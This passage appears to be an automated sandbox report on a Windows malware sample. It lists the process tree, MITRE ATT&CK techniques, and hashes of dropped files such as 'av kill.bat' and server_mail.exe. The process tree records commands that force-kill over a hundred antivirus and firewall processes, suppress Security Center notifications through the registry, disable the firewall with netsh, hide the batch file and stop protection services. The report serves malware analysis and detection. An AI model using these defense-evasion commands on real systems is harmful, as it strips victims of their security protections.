    - Kills process with taskkill
    PID:2588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pf2.exe
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im persfw.exe
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im periscope.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pcfwallicon.exe
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pccwin97.exe
    3⤵
    PID:900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pcciomon.exe
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pccclient.exe
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pc -cillin.exe
    3⤵
    - Kills process with taskkill
    PID:968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pc -cillan.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavw.exe
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavproxy.exe
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pav.exe
    3⤵
    - Adds Run key to start application
    PID:2748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im panixk.exe
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pandaav.exe
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im padmin.exe
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ostronet.exe
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im offguard.exe
    3⤵
    PID:336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nwservice.exe
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nvc95.exe
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nupgrade.exe
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ntxconfig.exe
    3⤵
    - Kills process with taskkill
    PID:2816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ntrtscan.exe
    3⤵
    - Kills process with taskkill
    PID:2156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nresq32.exe
    3⤵
    PID:768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npscheck.exe
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npfw32.exe
    3⤵
    - Kills process with taskkill
    PID:2848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npfmessenger.exe
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nortonav.exe
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton_av.exe
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Norton Auto-Protect.exe
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norman32.exe
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norman_32.exe
    3⤵
    PID:688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nisumnisservnisum.exe
    3⤵
    PID:952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nisserv.exe
    3⤵
    - Kills process with taskkill
    PID:472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netutils].exe
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netstat.exe
    3⤵
    PID:384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netscanpro.exe
    3⤵
    - Kills process with taskkill
    PID:788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netmon.exe
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netcommando.exe
    3⤵
    PID:576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im neowatchlog.exe
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ndd32.exe
    3⤵
    PID:324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nc2000.exe
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Navwnt.exe
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navw32.exe
    3⤵
    - Kills process with taskkill
    PID:2940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navrunr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navlu32.exe
    3⤵
    - Kills process with taskkill
    PID:2960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navdx.exe
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navauto -protect.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im NAVAPW32.exe
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navap.exe
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nav32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nav.exe
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mxtask.exe
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mrflux.exe
    3⤵
    - Kills process with taskkill
    PID:2928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im moolive.exe
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im monsys32.exe
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mon.exe
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mgui.exe
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mgavrte.exe
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mgavrtcl.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcvsrte.exe
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mctool.exe
    3⤵
    PID:968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcmnhdlr.exe
    3⤵
    - Kills process with taskkill
    PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcafee.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im lucomserver.exe
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im lockdown.exe
    3⤵
    - Kills process with taskkill
    PID:1464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ldscan.exe
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ldnetmon.exe
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im jedi.exe
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im jammer.exe
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iface.exe
    3⤵
    - Kills process with taskkill
    PID:2168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im icsupp95.exe
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im icloadnt.exe
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ibmasn.exe
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iamstats.exe
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iamapp.exe
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im guard.exe
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im gedit.exe
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsmb32.exe
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsav95.exe
    3⤵
    - Kills process with taskkill
    PID:1800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im frw.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fprot.exe
    3⤵
    PID:384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fp -win.exe
    3⤵
    - Kills process with taskkill
    PID:1272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im flowprotector.exe
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im findviru.exe
    3⤵
    PID:692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fast.exe
    3⤵
    PID:480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im etrustcipe.exe
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im escanv95.exe
    3⤵
    - Kills process with taskkill
    PID:1592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im escanhnt.exe
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im esafe.exe
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ecengine.exe
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im dvp95.exe
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im drweb32.exe
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im dpf.exe
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im deputy.exe
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im defscangui.exe
    3⤵
    - Kills process with taskkill
    PID:2988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ctrl.exe
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cpd.exe
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im conseal.exe
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im codered.exe
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cmgrdian.exe
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cleaner3.exe
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im claw95cf.exe
    3⤵
    PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cfinet32.exe
    3⤵
    - Kills process with taskkill
    PID:972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cfiaudit.exe
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccpxysvc.exe
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccIMScan.exe
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccApp.exe
    3⤵
    PID:544
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im borg2.exe
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im blackice.exe
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bipcp.exe
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bidef.exe
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxsch.exe
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxnews.exe
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxmonitornt.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxlive.exe
    3⤵
    - Kills process with taskkill
    PID:1940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxgui.exe
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avwin95.exe
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avsched32.exe
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpupdates.exe
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpupd.exe
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avptc.exe
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpm.exe
    3⤵
    - Kills process with taskkill
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpexec.exe
    3⤵
    - Kills process with taskkill
    PID:2208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im AVPCC Service.exe
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpcc.exe
    3⤵
    - Kills process with taskkill
    PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avnt.exe
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avkwcl9.exe
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avkserv.exe
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgw.exe
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv9.exe
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgcc32.exe
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avconsol.exe
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im autotrace.exe
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im atscan.exe
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im atguard.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im apvxdwin.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im apimonitor.exe
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ants.exe
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im antivir.exe
    3⤵
    - Kills process with taskkill
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im anti -trojan.exe
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im amonavp32.exe
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im amon9x.exe
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im alogserv.exe
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im alertsvc.exe
    3⤵
    - Kills process with taskkill
    PID:3032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im agv.exe
    3⤵
    - Kills process with taskkill
    PID:2384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im advxdwin.exe
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im _avpm.exe
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im _avp32.exe
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpfwizard.exe
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpfservice.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpfagent.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mghtml.exe
    3⤵
    PID:384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcregwiz.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcdetect.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im kpf4ss.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spywareguard.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spiderml.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avsched32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgnt.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im webproxy.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avengine.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavprsrv.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npfmntor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccapp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccsetmgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navw32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im updclient.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zonealarm.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im outpost.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcafee.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im gcasdtserv.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ewidoctrl.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im aswupdsv.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashserv.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashmaisv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgupsvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgcc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im kavmm.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\microsoft\security center" /f /v FirewallDisableNotify /t REG_DWORD /d 1
    3⤵
    - Windows security bypass
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\microsoft\security center" /f /v AntiVirusDisableNotify /t REG_DWORD /d 1
    3⤵
    - Windows security bypass
    PID:2680
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode = disable
    3⤵
    - Modifies Windows Firewall
    - Loads dropped DLL
    PID:2836
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +A +S +H killer.bat
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2536
- C:\Users\Admin\AppData\Local\Temp\server_mail.exe
  "C:\Users\Admin\AppData\Local\Temp\server_mail.exe"
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\fservice.exe
    C:\Windows\system32\fservice.exe
    3⤵
    PID:2632

C:\Windows\SysWOW64\NET.exe
NET STOP navapsvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 STOP navapsvc
  2⤵
  PID:940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 STOP srservice
1⤵
PID:2008

C:\Windows\SysWOW64\NET.exe
NET STOP srservice
1⤵
- Suspicious use of WriteProcessMemory
PID:2528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\av kill.bat

Filesize
19KB

MD5
14adcce2df9ea2565e81556e62b46405

SHA1
61efb2933c1627502ee6c38a229a07de0721685f

SHA256
1c54f794c80a8d85aa01348cb725123bf62499522027e52de064963e893e2c48

SHA512
5756291d722b7847ffdc0e815b668963e4d6d96ac941c65d9df25bbd38d6a07908c628cc2a3e1fe68431718cbf26b5272bef40c8e1c3500fc1276aed5bb54152

Download Submit
C:\Users\Admin\AppData\Local\Temp\server_mail.exe

Filesize
92KB

MD5
e6b1c3e12a20a97b0917d066ef07fa50

SHA1
a6695d23a5395599a23d4d0bb08151082135fe84

SHA256
27f772c6f5fda7f2c00997582f7fa6ac7771f5d33dcda40e687d6ecc77b5a20e

SHA512
58a16483a535da131b78652e27ed7e7fa4310c768a4bb6d344424f0ac730f9ee49064799227ac65ece09dbc6fea9eba8688f86d9eb80c988ce28dd3d9c35eaf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\server_mail.exe.bat

Filesize
133B

MD5
f2dcab69da277c687a8b7cccdb228481

SHA1
b35255aac073fce7c7b9d9ec022957e5be7908d4

SHA256
0818b6c6a2553b73d821b645986affa6e99961012525dab6e9e9197ede9ae110

SHA512
56919132253e7e06a50b3ea083a6335a7c2bdd27bce8f7169e9cf5c2400be2fd61d1d57affde2341579e08ed40286fe1933571fd7d727c9f56f2438969c5a689

Download Submit
C:\Windows\services.exe

Filesize
341KB

MD5
489aea4a642af468707c73f9479914f1

SHA1
707ccced3165e55ae2a724dd0300d15ca3264979

SHA256
8cfb26c39cf0255824b59111c9d6fcf391a55fd445b75ea6bbfef027c4f7265a

SHA512
75e1c5d32d033947d702f82cb3fcf96c704cfe926bd4798a68cd82cd4c1634a4fb4de049287d59b41a00691080740c83c17164bef4740025b74976fc338fc12a

Download Submit
\Users\Admin\AppData\Local\Temp\aklremover.exe

Filesize
40KB

MD5
e9c593544bb6071b8853d2f7d4d5dbc9

SHA1
b3b5f5576dad83e358ea384d40912a74aecd5c5d

SHA256
9e90af01904e6b7a5779f0cbd6378668645108da14a562b89436b677b253b3b9

SHA512
2ff7d4e08c7518c422b2ecd03bec19bbb2da9f3afd7da8690f5453cb8e7c63cd3a35b94881e06c84e7fba10f921771bfa787f51039fb8991a1ec8f37c2495787

Download Submit
\Windows\SysWOW64\reginv.dll

Filesize
36KB

MD5
d4a3f90e159ffbcbc4f9740de4b7f171

SHA1
0542f5d1e2c23dca8d90766b3a8537dc3880e5c9

SHA256
2200dd5f83d2fb8c5d3994206a4fa9ff34b4cbfe56ed39a9a03c954cf45d8f77

SHA512
5493beb50b5f7d8ec52f32718d01696916ae173456005d0c1294ce695161ce5004aff58ee3892bf5db0f9b23720146a6d3ae8ffbcbbd81f84d894fdc8cf75a94

Download Submit
\Windows\SysWOW64\winkey.dll

Filesize
24KB

MD5
43e7d9b875c921ba6be38d45540fb9dd

SHA1
f22a73fc0d4aa3ea6c0b8f61d974b028f308acc4

SHA256
f1b2b0abe844e6ba812c7f8709a463a7f6c56fa6ac38d376a0739cc3469f795b

SHA512
2e74e23c0875b69b82319391c392132f28f4eb45aa412805130382498ae48969a06a2b3a7528b626fa7d7ddb6b006f19f0ef8d73cf73cb9a0c0df44a21077622

Download Submit
memory/2632-84-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2632-69-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2632-71-0x00000000032D0000-0x00000000034CF000-memory.dmp

Filesize
2.0MB

Download
memory/2632-66-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2660-30-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2784-9-0x00000000041E0000-0x00000000041E1000-memory.dmp

Filesize
4KB

Download
memory/2784-39-0x0000000006120000-0x000000000631F000-memory.dmp

Filesize
2.0MB

Download
memory/2784-6-0x00000000041F0000-0x00000000041F3000-memory.dmp

Filesize
12KB

Download
memory/2784-8-0x00000000041D0000-0x00000000041D1000-memory.dmp

Filesize
4KB

Download
memory/2784-12-0x0000000004210000-0x0000000004211000-memory.dmp

Filesize
4KB

Download
memory/2784-10-0x0000000004200000-0x0000000004201000-memory.dmp

Filesize
4KB

Download
memory/2784-7-0x00000000041B0000-0x00000000041B1000-memory.dmp

Filesize
4KB

Download
memory/2784-40-0x0000000000400000-0x00000000006A4000-memory.dmp

Filesize
2.6MB

Download
memory/2784-1-0x0000000001E00000-0x0000000001EFA000-memory.dmp

Filesize
1000KB

Download
memory/2784-5-0x0000000000400000-0x00000000006A4000-memory.dmp

Filesize
2.6MB

Download
memory/2784-0-0x0000000000400000-0x00000000006A4000-memory.dmp

Filesize
2.6MB

Download
memory/2784-2-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2792-89-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2792-55-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2792-41-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2792-60-0x0000000003270000-0x000000000346F000-memory.dmp

Filesize
2.0MB

Download
memory/2864-121-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2948-133-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-136-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-73-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2948-130-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-131-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2948-132-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
